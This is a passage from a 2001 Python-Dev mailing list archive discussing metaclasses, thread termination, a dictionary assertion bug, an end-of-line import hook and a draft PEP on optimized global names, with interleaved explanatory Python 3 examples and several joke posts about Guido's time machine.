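The kind of single "*that* it happens" example Mark and Guido have in mind might look like the following sketch in Python 3 syntax. It shows the effect without explaining why. The loop adds 0.1 ten times; because 0.1 has no exact binary representation and each addition rounds, the total is not exactly 1.0.

```python
total = 0.0
for _ in range(10):
    total += 0.1          # each addition rounds to the nearest double

print(total == 1.0)       # False
print(repr(total))        # 0.9999999999999999
```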

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:52:02 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:52:02 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200."
             <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
References: <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com>

> May I suggest adding an optional third boolean parameter to
> os.rename called 'replace', defaulting to either TRUE or FALSE,
> so that modifying existing apps becomes even less of a hassle for
> potential porters.

I see no reason to change the API.

In any case, for backwards compatibility, the default would have to be
platform dependent, which strikes me as just as bad as the current
situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Wed May 23 16:00:25 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 16:00:25 +0200
Subject: [Python-Dev] Python 2.1.1
Message-ID: <20010523160025.B690@xs4all.nl>

As those of you on python-checkins might have noticed ;) I started checking
in Python 2.1.1 bugfixes. I'd hoped to finish all of my backlog today, but
unfortunately I'm now called away on a surprise emergency meeting, so I'm not
sure if I'll make it. The 2.1.1 tree is in a somewhat unstable state right now;
I'll fix that today in any case, but after the meeting.

(As for why I started doing it: I just spent about two weeks of digging
through Pine source code, and its imap server in particular, and I decided I
deserved a break -- Python reads like a Heinlein novel, after pine code:
readable, straight-forward, and just enough complexity to keep it
entertaining :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From aahz at rahul.net  Wed May 23 16:08:45 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 07:08:45 -0700 (PDT)
Subject: [Python-Dev] Killing threads
Message-ID: <20010523140845.B092299C83@waltz.rahul.net>

Okay, so we all know it isn't possible to kill threads cleanly and
safely in any kind of cross-platform way.  At the same time, a program
that has a thread running haywire should be able to kill itself
completely, so that a monitoring process can restart it.  How hard would
it be to do only that in a cross-platform way?

I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
clue what would need to happen for Windows and Mac.

(This got brought up because I experimented with os._exit() as a
possible solution, but that GPFs on Win98SE.)
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From thomas.heller at ion-tof.com  Wed May 23 19:28:07 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 19:28:07 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>

[this message has also been posted to comp.lang.python]
Guido's metaclass hook in Python goes this way:

If a base class (let's better call it a 'base object')
has a __class__ attribute, this is called to create the
new class.


From guido at digicool.com  Wed May 23 20:02:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 14:02:06 -0400
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200."
             <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>  
            <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
Message-ID: <200105231802.f4NI26408784@odiug.digicool.com>

> [this message has also been posted to comp.lang.python]
[And I'm cc'ing there]

> Guido's metaclass hook in Python goes this way:
> 
> If a base class (let's better call it a 'base object')
> has a __class__ attribute, this is called to create the
> new class.
> 
> From demo/metaclasses/index.html:
> 
> class C(B):
>     a = 1
>     b = 2
> 
> Assuming B has a __class__ attribute, this translates into:
> 
> C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Yes.

> Usually B is an instance of a normal class.

No, B should behave like a class, which makes it an instance of a
metaclass.

> So the above code will create an instance of B,
> call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
> and assign the instance of B to the variable C.

No, it will not create an instance of B.  It will create an instance
of B.__class__, and that instance (C) is a subclass of B.  The difference between
subclassing and instantiation is confusing, but crucial, when talking
about metaclasses!  See the ASCII art in my classic post to the
types-sig:
http://mail.python.org/pipermail/types-sig/1998-November/000084.html
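In present-day Python 3 the metaclass is taken from the real type of the bases (or from an explicit metaclass= keyword), not from a __class__ attribute found on a base object. The translation Guido describes can still be spelled out by hand, though. A minimal sketch (Meta, B and C are illustrative names) that also shows the instance-versus-subclass distinction:

```python
class Meta(type):
    """A trivial metaclass; every class it creates is an instance of Meta."""


class B(metaclass=Meta):
    pass


# Roughly what the statement
#     class C(B):
#         a = 1
#         b = 2
# does: call B's metaclass with (name, bases, namespace).
C = type(B)('C', (B,), {'a': 1, 'b': 2})

print(isinstance(C, Meta))  # True: C is an *instance* of the metaclass
print(issubclass(C, B))     # True: C is a *subclass* of B
print(isinstance(C, B))     # False: C is not an instance of B
```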

> Ever since, I've been playing with this metaclass hook, and
> have always run into the problem that B has to completely
> simulate the normal Python behaviour for classes (modifying,
> of course, whatever you want to change).
> 
> The problem is that there are a lot of successful and
> unsuccessful attribute lookups, which involve a lot
> of overhead when implemented in Python, so the result
> is very slow (too slow to be usable in some cases).

Yes.  You should be able to subclass an existing metaclass!
Fortunately, in the descr-branch code in CVS, this is possible.  I
haven't explored it much yet, but it should be possible to do things
like:

Integer = type(0)
Class = Integer.__class__   # same as type(Integer)

class MyClass(Class):
    pass    # metaclass customizations would go here

MyObject = MyClass("MyObject", (), {})

myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class
that uses MyClass for its metaclass.  Then, myInstance is an instance
of MyObject.
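What subclassing a metaclass buys is visible in today's Python, whose new-style classes came out of this descr-branch work. You override only the behaviour you want and inherit everything else from type, instead of re-simulating class semantics in Python. A sketch with a hypothetical CountingMeta that counts how many instances each class creates:

```python
class CountingMeta(type):
    """Hypothetical metaclass that counts instances of each class it makes.

    Only __init__ and __call__ are overridden; attribute lookup, method
    binding, inheritance and so on come unchanged from `type`.
    """

    def __init__(cls, name, bases, namespace):
        super().__init__(name, bases, namespace)
        cls.instance_count = 0

    def __call__(cls, *args, **kwargs):
        instance = super().__call__(*args, **kwargs)  # normal construction
        cls.instance_count += 1
        return instance


# Same shape as the MyObject = MyClass("MyObject", (), {}) example above.
MyObject = CountingMeta("MyObject", (), {})
first = MyObject()
second = MyObject()
print(MyObject.instance_count)
```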

See the end of PEP 252 for info on getting the descr-branch code
(http://python.sourceforge.net/peps/pep-0252.html).

> ------
> 
> Python 2.1 allows you to attach attributes to function objects,
> so a new metaclass pattern can be implemented.
> 
> The idea is to let B be a function having a __class__ attribute
> (which does _not_ have to be a class, it can again be a function).

Oh, yuck.  I suppose this is fine if you want to experiment with
metaclasses in 2.1, but please consider using the descr-branch code
instead so you can see what 2.2 will be like!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May 23 20:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 23 May 2001 20:40:58 +0200
Subject: [Python-Dev] Daily Python URL on your Palm
Message-ID: <3B0C043A.D5C9C604@lemburg.com>

Just thought you might want to know that Fredrik's Daily Python
URL can be downloaded onto the Palm as an AvantGo channel.

Here's the URL for adding the channel:
http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00

PS: Would be nice if Fredrik could provide a "printable" version
of the Daily URL page, since the table layout doesn't work too
well on the small Palm display.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May 23 20:57:28 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 20:57:28 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>              <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>  <200105231802.f4NI26408784@odiug.digicool.com>
Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook>

Let me try again (and please forgive my
mistakes in the detail).
The usual way (as in demo\metaclasses):

class B_Meta:
    ....

B = B_Meta('B', (), {})

class C(B):
    pass

B is an instance of the (meta)class B_Meta.
C is now another instance of the same (meta)class,
because B.__class__, which is the (meta)class itself,
is called and returns a new instance.
B_Meta can (and must) implement a lot of behaviour.

In contrast, with my recipe:

def MagicFunction(name, bases, dict):
    ...construct a class on the fly...
    ...create an instance of this class...
    return an_instance_of_a_class

def B(): pass
B.__class__ = MagicFunction

class C(B):
    pass

Now C is an_instance_of_a_class (which is an instance
of a normal python class), and thus does inherit the
normal behaviour of Python classes.
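In Python 3 the same effect no longer needs a dummy function base. Any callable may be passed as metaclass=, and the class statement binds whatever that callable returns. The sketch below uses a hypothetical magic_function as a stand-in for MagicFunction. It builds an ordinary class on the fly and returns an instance of it, so C ends up being that instance.

```python
def magic_function(name, bases, namespace):
    """Hypothetical stand-in for MagicFunction: build a class, return an instance."""
    cls = type(name, bases, namespace)   # an ordinary Python class
    return cls()


class C(metaclass=magic_function):
    a = 1

    def greet(self):
        return "hello from %s" % type(self).__name__


print(isinstance(C, type))   # False: C is an instance, not a class
print(C.greet())
```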

Thomas

PS: I'm sure this all will be much better in descr-branch.
I've checked it out and am playing with it from time
to time, but most of the time I have to use released
Python versions.


From tim.one at home.com  Wed May 23 21:32:59 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:32:59 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523160025.B690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>

[Thomas Wouters]
>
> As those of you on python-checkins might have noticed ;) I started
> checking in Python 2.1.1 bugfixes.

And bless you for it, Thomas!

> I'd hoped to finish all of my backlog today, but unfortunately I'm
> now called away on a surprise emergency meeting,

Now that sucks.  Tell your manager that you'll only attend planned emergency
meetings from now on:  Guido plans Python crises years in advance, and it
shows in the relative cleanliness of the Python codebase <wink>.


From nas at python.ca  Wed May 23 21:41:14 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 23 May 2001 12:41:14 -0700
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
Message-ID: <20010523124114.A4747@glacier.fnational.com>

Tim Peters wrote:
> Guido plans Python crises years in advance, and it shows in the
> relative cleanliness of the Python codebase <wink>.

I don't think Thomas has a time machine.

  Neil


From tim.one at home.com  Wed May 23 21:45:06 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:45:06 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com>

[Aahz]
> Okay, so we all know it isn't possible to kill threads cleanly and
> safely in any kind of cross-platform way.  At the same time, a program
> that has a thread running haywire should be able to kill itself
> completely, so that a monitoring process can restart it.  How hard would
> it be to do only that in a cross-platform way?

Since Python is written in C, and C says nothing about this, you need a
platform expert for each platform covered by "cross" <wink>.

> I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
> clue what would need to happen for Windows and Mac.
>
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

Please open a bug report on that, then, with a tiny test case if possible.
This worked fine on Win98SE for me just now:

import thread, os, time

def task():
    while 1:
        print "x",
        time.sleep(.1)

for i in range(10):
    thread.start_new_thread(task, ())

time.sleep(5)
os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits.
You don't need to do os._exit(), and sys.exit() is normally a much better
idea (else, e.g., stdio buffers may not get flushed to disk).
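Tim's point about stdio buffers can be demonstrated with a child process. The sketch below is in Python 3; the CHILD script and the run_child() helper are hypothetical. With stdout redirected to a pipe, the child's print() output sits in a buffer. sys.exit() flushes it during normal shutdown, while os._exit() ends the process at once and the output is lost. In both cases the runaway daemon thread does not keep the process alive.

```python
import os
import subprocess
import sys

CHILD = r'''
import os, sys, threading, time

def runaway():
    # stands in for a thread that has gone "haywire"
    while True:
        time.sleep(0.1)

threading.Thread(target=runaway, daemon=True).start()
print("last words")       # buffered, because stdout is a pipe
time.sleep(0.2)
if sys.argv[1] == "os._exit":
    os._exit(1)           # immediate exit: buffers are NOT flushed
else:
    sys.exit(1)           # normal shutdown: buffers are flushed
'''


def run_child(how):
    env = dict(os.environ)
    env.pop("PYTHONUNBUFFERED", None)   # make sure stdout really is buffered
    proc = subprocess.run([sys.executable, "-c", CHILD, how],
                          stdout=subprocess.PIPE, env=env, timeout=30)
    return proc.returncode, proc.stdout


print(run_child("sys.exit"))
print(run_child("os._exit"))
```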


From thomas at xs4all.net  Wed May 23 22:27:51 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 22:27:51 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com>
Message-ID: <20010523222751.G690@xs4all.nl>

On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote:
> Tim Peters wrote:
> > Guido plans Python crises years in advance, and it shows in the
> > relative cleanliness of the Python codebase <wink>.
> 
> I don't think Thomas has a time machine.

*Don't* get me started on that. If only Guido would stop hogging the damned
thing, I could be a 34-year-old millionaire in a 10-room house and 8
girlfriends !

Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly
y'rs,
-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May 23 22:32:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 16:32:04 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

You wouldn't happen to have a reproducible test case?  That hash==8 is almost
certainly a red herring -- or a sign of wild stores <wink>.

> Going back to revision 2.90 fixes the problem (or masks it).

Instead of:

	assert(mp->ma_fill < mp->ma_size);

this code used to be:

	if (mp->ma_fill >= mp->ma_size) {
		/* No room for a new key.
		 * This only happens when the dict is empty.
		 * Let dictresize() create a minimal dict.
		 */
		assert(mp->ma_used == 0);
		if (dictresize(mp, 0) != 0)
			return -1;
		assert(mp->ma_fill < mp->ma_size);
	}

so the dict would get resized whenever ma_fill >= ma_size, although the code
only *expected* that to happen when the dict table was NULL.  It was perhaps
happening in other cases too.  The dict is never empty (NULL) after the
patch, so the special case for "empty" got replaced by an assert.

Offhand I don't see how this could be triggering -- although *something*
about the 2.90 logic makes me uneasy!  Ah, mp->ma_fill >= mp->ma_size wasn't
a correct test:  filled slots that aren't used slots don't stop a new key
from being added.  Assuming that's it, 2.90 could do needless calls to
dictresize, but the new version does a bogus assert instead.  So replace the
current version's offending

	assert(mp->ma_fill < mp->ma_size);

with

	assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it.

2.90 may also suffer a bogus

		assert(mp->ma_used == 0);

failure.  It's not easy to provoke any of this, though (requires exactly the
right sequence of mixed inserts and deletes, with hash codes hitting exactly
the right dict slots).
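A toy Python model may make the fill/used distinction concrete. It is a sketch under stated assumptions, not dictobject.c. It uses linear probing, a fixed table of 8 slots and no resizing, and CPython's probe sequence and resize policy differ. First insert keys 0-4, delete them, then insert 5-7. At that point fill equals size but used is only 3. Key 8 then reuses a dummy slot. So an assert(fill < size) would fire even though there is room, while assert(used < size) holds.

```python
# Toy open-addressing table that marks deleted entries with a dummy
# sentinel.  Assumptions: linear probing, fixed size, no resizing.

DUMMY = object()   # left behind in a slot when its key is deleted


class ToyDict:
    def __init__(self, size=8):
        self.size = size
        self.keys = [None] * size   # None = slot never used
        self.vals = [None] * size
        self.fill = 0               # active + dummy slots (cf. ma_fill)
        self.used = 0               # active slots only (cf. ma_used)

    def _probe(self, key):
        """Yield slot indices for key in linear probe order."""
        start = hash(key) % self.size
        for k in range(self.size):
            yield (start + k) % self.size

    def __setitem__(self, key, val):
        free = None                 # first dummy or never-used slot seen
        for i in self._probe(key):
            k = self.keys[i]
            if k is None:           # end of the probe chain
                if free is None:
                    free = i
                break
            if k is DUMMY:
                if free is None:
                    free = i        # reusable, but keep looking for key
            elif k == key:
                self.vals[i] = val  # key already present: overwrite
                return
        if free is None:
            raise RuntimeError("no dummy or empty slot left")
        if self.keys[free] is None:
            self.fill += 1          # only a never-used slot raises fill
        self.keys[free] = key
        self.vals[free] = val
        self.used += 1

    def __delitem__(self, key):
        for i in self._probe(key):
            k = self.keys[i]
            if k is None:
                break
            if k is not DUMMY and k == key:
                self.keys[i] = DUMMY    # fill unchanged, used drops
                self.vals[i] = None
                self.used -= 1
                return
        raise KeyError(key)


d = ToyDict(8)
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 8):
    d[i] = i
print(d.fill, d.used)   # 8 3: fill == size, yet 5 slots are reusable
d[8] = 8                # hash(8) % 8 == 0 lands on a dummy slot
print(d.fill, d.used)   # 8 4
```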


From barry at digicool.com  Wed May 23 22:52:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 16:52:22 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
Message-ID: <15116.8966.324136.897953@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> *Don't* get me started on that. If only Guido would stop
    TW> hogging the damned thing, I could be a 34-year-old millionaire
    TW> in a 10-room house and 8 girlfriends !

It's really not as easy as all that, though.  When Guido's not around,
I've been known to, er, take The Machine for a spin (sshh!  Do /not/
tell him!).  The first time I did, I didn't realize that the blue
toggle had to be in the down position, and when I stepped out,
everybody was speaking Esperanto, had half their heads shaved, and
were toting around what looked like a cross between a dog and a beach
ball (it drooled incessantly).

Fortunately, The Machine has a reset button (oddly labeled "History
Erase Button" and guarded by a candy-crazed TV announcer-like
automaton who must be coaxed from the button with a marshmallow
s'more).

The second time I used it, I'd forgotten that you must keep your left
hand on the silver sphere while you line up the parallel lines with
the lip-actuated alpha wheel.  Silly me, I'd removed my left hand just
before alignment in order to twist the fluoroscopic reflection tube a
quarter rotation out of phase (rule of thumb: never listen to that
automaton when he's licked the last of the chocolate-y goo from his
fingers.  He'll say anything to get another s'more.)

You really don't want to know what that particular world looked like,
but let's just say it involved lots and lots of angry elephants.

So now I leave well enough alone, and I've learned that if you really
want to change the past, just wait for Guido to use it for his own
nefarious purposes, and tape a sign to his back requesting the (very
modest) change to the continuum that you're looking for.

And don't forget to smear the front of that sign with s'more.

-Barry


From tim.one at home.com  Wed May 23 23:02:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 17:02:17 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGECAKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

[Tim]
> You wouldn't happen to have a reproducible test case?

Nevermind; I do:

d = {}
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 9):  # assert triggers when i == 8
    d[i] = i

The cure is more complicated than I described, though.


From esr at thyrsus.com  Thu May 24 00:39:49 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 18:39:49 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523183949.A19251@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> You really don't want to know what that particular world looked like,
> but let's just say it involved lots and lots of angry elephants.

You've been *there*?  Dang...that's the timeline that scared me into
hanging up my lab coat.  It was a slow Saturday and I was hatching
Sinister Plan For World Domination number 4.

What happened to the other three?  Well...I had been planning to
terrorize the western U.S. with a giant mechanical spider, until some
guys from Hollywood offered me way too much money for it.  The trained
army of radioactive gorillas I spent the movie money on didn't work
out -- my Igor flatly refused to shovel any more radioactive gorilla
poop, and you know how hard it is to get good help these days.
Blackmailing major cities with a Zeppelin-mounted death ray projector
sounded cool but Radio Shack was out of the parts.

OK, so plan #4 was to create voracious mega-amoebas using my Ionic
Mutatron and send them out to destroy all my enemies, especially that
kid who beat me up in third grade.  There I was, cackling insanely,
just about to unleash these slimy horrors on an unsuspecting world to
wreak havoc and destruction, when the eka-rhodium electrodes on the
Mutatron arced over.  This produced a wild spike of temporokinetic
energy, and guess where *I* was standing?  Silly me.

Before you could say "plot complication" I was materializing in the
Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself,
as it turned out, who was getting wound up to try out his newest
human-goad on a mahout they had just captured from the Fortified
Cities.  The mahout was terrified out of his wits, and you would have
been too if you'd seen what the High Pachyderm's tusks were covered
with and the lascivious way his trunk was curled around that cheese
grater.  Euggghhh...

It was crazy.  The High Pachyderm was trumpeting like mad, tuskers
charging at me from all directions, and me with at least 5.23 seconds
to go until the temporokinetic charge wore off.  Fortunately I
remembered that elephants communicate using modulated infrasonics that
they hear with the flat part of their foreheads, and I had my trusty
sonic screwdriver on me.  I set it to "infra" at maximum volume and
hurled it at the High Pachyderm -- hit the bugger right in the tiara.
He went berserk and his confused guards started crashing into each
other left and right, which was a pretty impressive sight since the
smallest of them weighed over two and a half tons.
 
It was touch and go there, let me tell you.  I caught one glimpse of
the mahout's rapidly-retreating heels just as the charge wore off and
I was slingshotted back to my lab.  My sonic screwdriver, of course,
followed within seconds -- horribly crushed and mangled.

And that's when I swore off building fiendish devices.  Electrocution
I can laugh at, having my monstrous creations turn on me is all in a
day's work, and that one time I was accidentally transformed into a
fly I found some truly remarkable uses for a three-foot-long
prehensile tongue.  But what the High Pachyderm had planned was too
twisted even for *me*.

I decided Sinister Plan #5 would have to be a bit less hardware-intensive,
if only as a rest for my frazzled nerves.  So I spent the last juice in
the batteries on the orbital mind-control lasers (long story) to implant
some subtle suggestions in a few minds at Netscape and IBM and elsewhere,
and started hitting the conference circuit pretty heavy.

What suggestions?  Oh, nothing important.  Nothing at all...BWAHAHAHAHA!!!
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes the law defends plunder and participates in it. Sometimes
the law places the whole apparatus of judges, police, prisons and
gendarmes at the service of the plunderers, and treats the victim --
when he defends himself -- as a criminal.
	-- Frederic Bastiat, "The Law"


From gward at python.net  Thu May 24 01:48:10 2001
From: gward at python.net (Greg Ward)
Date: Wed, 23 May 2001 19:48:10 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523194810.A9947@gerg.ca>

On 23 May 2001, Barry A. Warsaw said:
> The second time I used it, I'd forgotten that you must keep your left
> hand on the silver sphere while you line up the parallel lines with
> the lip-actuated alpha wheel.

What?  You mean Guido's time machine was really designed by Larry Wall?
Oh, the irony...

        Greg
-- 
Greg Ward - Python bigot                                gward at python.net
http://starship.python.net/~gward/
If you can read this, thank a programmer.


From dgoodger at bigfoot.com  Thu May 24 03:04:46 2001
From: dgoodger at bigfoot.com (David Goodger)
Date: Wed, 23 May 2001 21:04:46 -0400
Subject: [Python-Dev] Re: Import hook to do end-of-line conversion?
In-Reply-To: <3B0AF45D.732126E6@home.net>
Message-ID: <B731D420.11CB9%dgoodger@bigfoot.com>

Yesterday I found I had need for an end-of-line conversion import hook. I
looked around but found none (did I miss some code on this thread?), so I
whipped one up (below). It seems to do the job. If you see any goofs, gaffes
or gotchas, or if you know of a better way to do this, please let me know. I
will post this code to c.l.py in a few days for the enjoyment of all.

-- 
David Goodger    dgoodger at bigfoot.com    Open-source projects:
 - The Go Tools Project: http://gotools.sourceforge.net
 - reStructuredText: http://structuredtext.sourceforge.net (soon!)

-----%<----------cut----------%<----------%<----------cut----------%<-----

# Import hook for end-of-line conversion,
# by David Goodger (dgoodger at bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()
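The load_source comment relies on a line-ending conversion before compiling. That conversion amounts to two string replacements. Here is a minimal sketch. The helper names are made up for illustration, and this is not py_compile's own code.

```python
def normalize_newlines(source):
    """Turn Windows (CRLF) and classic Mac (CR) line endings into LF."""
    # CRLF must be handled first, or it would become two newlines.
    return source.replace("\r\n", "\n").replace("\r", "\n")


def compile_any_eol(source, filename="<string>"):
    """Compile module source regardless of its line-ending convention."""
    return compile(normalize_newlines(source), filename, "exec")


mac_source = "x = 1\ry = x + 1\r"
namespace = {}
exec(compile_any_eol(mac_source), namespace)
print(namespace["y"])   # 2
```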


From jeremy at alum.mit.edu  Thu May 24 03:10:55 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Wed, 23 May 2001 21:10:55 -0400 (EDT)
Subject: [Python-Dev] pre-PEP on optimized global names
Message-ID: <200105240110.VAA09078@newman.concentric.net>

I've been hoping to work on optimized global and builtin name support
for Python 2.2.  I'm not sure if I'll have time, but thought I'd
circulate a draft with some notes on the subject now.  Anyone
interested in this work?

Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy at digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

    This PEP proposes a new implementation of global module namespaces
    and the builtin namespace that speeds name resolution.  The
    implementation would use an array of object pointers for most
    operations in these namespaces.  The compiler would assign indices
    for global variables at compile time.

    The current implementation represents these namespaces as
    dictionaries.  A global name incurs a dictionary lookup each time
    it is used; a builtin name incurs two dictionary lookups, a failed
    lookup in the global namespace and a second lookup in the builtin
    namespace. 

    This implementation should speed Python code that uses
    module-level functions and variables.  It should also eliminate
    awkward coding styles that have evolved to speed access to these
    names, such as binding a builtin to a local through a default
    argument (def f(x, len=len): ...).

    The implementation is complicated because the global and builtin
    namespaces can be modified dynamically in ways that are impossible
    for the compiler to detect.  (Example: A module's namespace is
    modified by a script after the module is imported.)  As a result,
    the implementation must maintain several auxiliary data structures
    to preserve these dynamic features.

Introduction

    [expand on the basic ideas in the abstract]

    [describe the key parts of the design: dlict, compiler support,
    stupid name trick workarounds, optimization of other modules'
    globals] 

DLict design

    The namespaces are implemented using a data structure that has
    sometimes gone under the name dlict.  It is a dictionary that has
    numbered slots for some dictionary entries.  The type must be
    implemented in C to achieve acceptable performance.  A Python
